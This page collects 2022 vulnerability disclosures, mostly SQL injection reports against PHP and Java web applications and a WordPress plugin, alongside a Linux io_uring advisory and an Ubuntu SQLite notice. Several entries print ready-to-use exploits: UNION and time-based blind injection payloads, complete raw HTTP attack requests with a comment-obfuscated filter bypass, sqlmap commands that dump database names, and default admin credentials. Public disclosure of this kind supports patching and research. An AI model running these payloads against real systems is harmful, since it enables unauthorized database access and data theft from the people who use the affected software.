School Activity Updates with SMS Notification v1.0 is vulnerable to SQL Injection via /activity/admin/modules/modstudent/index.php?view=view&id=.

**School Activity Updates with SMS Notification v1.0 by janobe has SQL injection**

BUG\_Author: salute

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/13799/school-activity-updates-sms-notification-phppdo.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /activity/admin/modules/modstudent/index.php?view=view&id=

Vulnerability location: /activity/admin/modules/modstudent/index.php?view=view&id=, id

dbname =db\_wvsu

\[+\] Payload: /activity/admin/modules/modstudent/index.php?view=view&id=-201806%27%20union%20select%201,2,database(),4,5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /activity/admin/modules/modstudent/index.php?view\=view&id\=\-201806%27%20union%20select%201,2,database(),4,5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

CVE-2022-38833: bug_report/SQLi-2.md at main · saluteSUC/bug_report

School Activity Updates with SMS Notification v1.0 is vulnerable to SQL Injection via /activity/admin/modules/department/index.php?view=edit&id=.

Permalink

Cannot retrieve contributors at this time

**School Activity Updates with SMS Notification v1.0 by janobe has SQL injection**

BUG\_Author: salute

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/13799/school-activity-updates-sms-notification-phppdo.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /activity/admin/modules/department/index.php?view=edit&id=

Vulnerability location: /activity/admin/modules/department/index.php?view=edit&id=, id

dbname =db\_wvsu

\[+\] Payload: /activity/admin/modules/department/index.php?view=edit&id=-3%27%20union%20select%201,database(),3--+ // Leak place ---> id

GET /activity/admin/modules/department/index.php?view\=edit&id\=\-3%27%20union%20select%201,database(),3\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

CVE-2022-38832: bug_report/SQLi-1.md at main · saluteSUC/bug_report

There exists a use-after-free in io_uring in the Linux kernel. Signalfd_poll() and binder_poll() use a waitqueue whose lifetime is the current task. It will send a POLLFREE notification to all waiters before the queue is freed. Unfortunately, the io_uring poll doesn't handle POLLFREE. This allows a use-after-free to occur if a signalfd or binder fd is polled with io_uring poll, and the waitqueue gets freed. We recommend upgrading past commit fc78b2fc21f10c4c9c4d5d659a685710ffa63659

CVE-2022-3176: 🐧🕺

ywoa v6.1 is vulnerable to SQL Injection via backend/oa/visual/exportExcel.do interface.

**Environment construction**

http://partner.yimihome.com/static/index.html#/index/sys\_env

Direct one-click installation can be started, and then login on the account admin password 1111111, login if prompted authentication expired can not log in, change the local system time can

http://172.16.140.189:8088/oa/setup/license.jsp

Once installed here, the source code is available for download at gitee

https://gitee.com/bestfeng/yimioa

Download a good local idea to open a static look at the code on

**idea**

Download: http://partner.yimihome.com/static/index.html#/index/idea\_deploy First set it up as shown here, after setting it up, import the database, after importing, you need to change the link configuration yimioa/c-core/src/main/ resources/application.properties Modify the mysql connection information, and then just start  But idea start, more bugs, and report more errors, here is idea static look at the code

**/oa/visual/exportExcel.do interface orderby injection Bypass****Vulnerability recurrence**

GET /oa/visual/exportExcel.do?code=personbasic&orderBy=id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)&op=1&sort=desc&isMine=true HTTP/1.1
Host: 172.16.140.186:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=339C404636300F5F43B74EC828919D11; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl

**bypass** poc

%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)

**Code audit and function implementation**

Did not find the corresponding web function point, here is a direct look at the static code interface audit  
  
orderby, here the parameters, and then look down, because the above personnel function point that GET injection already know getModuleListSqlAndUrlStr method, so look down, directly orderby passed in  
So it causes SQL injection, if not bypass, there will be no problem, after all, the filter method has been bypassed.

CVE-2022-38808: SQL injection exists in ywoa v6.1 backend/oa/visual/exportExcel.do interface · Issue #26 · cloudwebsoft/ywoa

Ubuntu Security Notice 5615-1 - It was discovered that SQLite incorrectly handled INTERSEC query processing. An attacker could use this issue to cause SQLite to crash, resulting in a denial of service, or possibly execute arbitrary code. It was discovered that SQLite incorrectly handled ALTER TABLE for views that have a nested FROM clause. An attacker could use this issue to cause SQLite to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue was only addressed in Ubuntu 20.04 LTS.

    ==========================================================================Ubuntu Security Notice USN-5615-1September 15, 2022sqlite3 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in SQLite.Software Description:- sqlite3: C library that implements an SQL database engineDetails:It was discovered that SQLite incorrectly handled INTERSEC queryprocessing. An attacker could use this issue to cause SQLite to crash,resulting in a denial of service, or possibly execute arbitrary code.(CVE-2020-35525)It was discovered that SQLite incorrectly handled ALTER TABLE for viewsthat have a nested FROM clause.  An attacker could use this issue to causeSQLite to crash, resulting in a denial of service, or possibly executearbitrary code. This issue was only addressed in Ubuntu 20.04 LTS.(CVE-2020-35527)It was discovered that SQLite incorrectly handled embedded null characterswhen tokenizing certain unicode strings. This issue could result inincorrect results. This issue only affected Ubuntu 20.04 LTS.(CVE-2021-20223)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  sqlite3                         3.31.1-4ubuntu0.4Ubuntu 18.04 LTS:  sqlite3                         3.22.0-1ubuntu0.6In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5615-1  CVE-2020-35525, CVE-2020-35527, CVE-2021-20223Package Information:  https://launchpad.net/ubuntu/+source/sqlite3/3.31.1-4ubuntu0.4  https://launchpad.net/ubuntu/+source/sqlite3/3.22.0-1ubuntu0.6

Ubuntu Security Notice USN-5615-1

Social Share Buttons version 2.2.3 suffers from a remote SQL injection vulnerability.

    ## Title: Social Share Buttons-2.2.3 SQLi## Author: nu11secur1ty## Date: 09.16.2022## Vendor: https://wordpress.org/## Software: https://downloads.wordpress.org/plugin/social-share-buttons-by-supsystic.2.2.3.zip## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3## Description:The `project_id` parameter from the Social Share Buttons-2.2.3 systemappears to be vulnerable to SQL injection attacks.The malicious user can dump-steal the database, from this system andhe can use it for very malicious purposes.WARNING: The attacker can retrieve all-database from this system!NOTE: The users of this system are NOT protected, this SQLvulnerability is CRITICAL!STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: project_id (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: action=social-sharing-share&project_id=378116348' or'3724'='3724' AND 7995=7995 AND 'rQVH'='rQVH&network_id=5&post_id=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: action=social-sharing-share&project_id=378116348' or'3724'='3724' AND (SELECT 9167 FROM (SELECT(SLEEP(5)))dQDw) AND'KWbC'='KWbC&network_id=5&post_id=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3)## Proof and Exploit:[href](https://streamable.com/m9r76w)

Social Share Button 2.2.3 SQL Injection

Rocket LMS version 1.6 suffers from a remote SQL injection vulnerability.

Rocket LMS 1.6 SQL Injection

There are two full (read/write) Blind/Time-based SQL injection vulnerabilities in the Northstar Club Management version 6.3 application. The vulnerabilities exist in the userName parameter of the processlogin.jsp page in the /northstar/Portal/ directory and the userID parameter of the login.jsp page in the /northstar/iphone/ directory. Exploitation of the SQL injection vulnerabilities allows full access to the database which contains critical data for organization’s that make full use of the software suite.

CVE-2022-26959

JFinal CMS 5.1.0 is vulnerable to SQL Injection.

Permalink

Cannot retrieve contributors at this time

**POC**

First of all you should install sqlmap

you need set

*   target domain or IP
*   your cookie

the run the shell

    sqlmap -u http://targetDomainOrIP/jfinal_cms/jfinal_cms/admin/contact/list  --thread 8 --batch --smart  --random-agent --data "
    form.orderColumn=*&form.orderAsc=&attr.name=%E4%B8%89&totalRecords=2&pageNo=1&pageSize=20&length=10"  --cookie "  your cookie  " --current-db
    

Sometimes you should know that the /jfinal\_cms/ is not necessary ,you need juede the route

**principle**

you can see the code of interface /system/menu/list

    sql.append(" order by ").append(orderBy);
    

There is a sql statement directly spliced

what is more

There is no measure to prevent sql injection because sql injection is required here

**solution**

By analyzing this function point, I found that the injection of orderby is fixed, such as id, name, menu key, so you can try to use parameterized query or make a whitelist

**What is more**

my test

    POST /jfinal_cms/admin/contact/list HTTP/1.1
    Host: 172.30.48.1
    Content-Length: 98
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://172.30.48.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://172.30.48.1/jfinal_cms/admin/contact/list
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=BF13B42EDFC3DEC180959D6DF143BD18; Hm_lvt_1040d081eea13b44d84a4af639640d51=1659122360; session_user="wgPmpe3hEuJWIL+I+kHtxqag1wutWsMhm6eaAgoJH0c="
    Connection: close
    
    form.orderColumn=*&form.orderAsc=&attr.name=%E4%B8%89&totalRecords=2&pageNo=1&pageSize=20&length=10
    

run it in sqlmap！！！ use -r

CVE-2022-37201: someEXP_of_jfinal_cms/sql4.md at main · AgainstTheLight/someEXP_of_jfinal_cms

JFinal CMS 5.1.0 is affected by: SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection

**POC**

First of all you should install sqlmap

you need set

*   target domain or IP
*   your cookie

the run the shell

    sqlmap -u http://targetDomainOrIP/jfinal_cms/system/config/list  --thread 8 --batch --smart  --random-agent --data "oper_type=1&form.orderColumn=*&form.orderAsc=asc&attr.name=&attr.key=&attr.type=-1&totalRecords=16&pageNo=1&pageSize=20&length=10"  --cookie "  your cookie  " --current-db
    

Sometimes you should know that the /jfinal\_cms/ is not necessary ,you need juede the route

**principle**

you can see the code of interface /system/menu/list

    sql.append(" order by ").append(orderBy);
    

There is a sql statement directly spliced

what is more

There is no measure to prevent sql injection because sql injection is required here

**solution**

By analyzing this function point, I found that the injection of orderby is fixed, such as id, name, menu key, so you can try to use parameterized query or make a whitelist

**PACKET**

    POST /jfinal_cms/system/config/list HTTP/1.1
    Host: 172.30.48.1
    Content-Length: 131
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://172.30.48.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://172.30.48.1/jfinal_cms/system/config/list
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=BF13B42EDFC3DEC180959D6DF143BD18; session_user="wgPmpe3hEuJWIL+I+kHtxqag1wutWsMhm6eaAgoJH0c="; Hm_lvt_1040d081eea13b44d84a4af639640d51=1659122360,1659131581; Hm_lpvt_1040d081eea13b44d84a4af639640d51=1659131581
    Connection: close
    
    oper_type=1&form.orderColumn=*&form.orderAsc=asc&attr.name=&attr.key=&attr.type=-1&totalRecords=16&pageNo=1&pageSize=20&length=10

Tag

#sql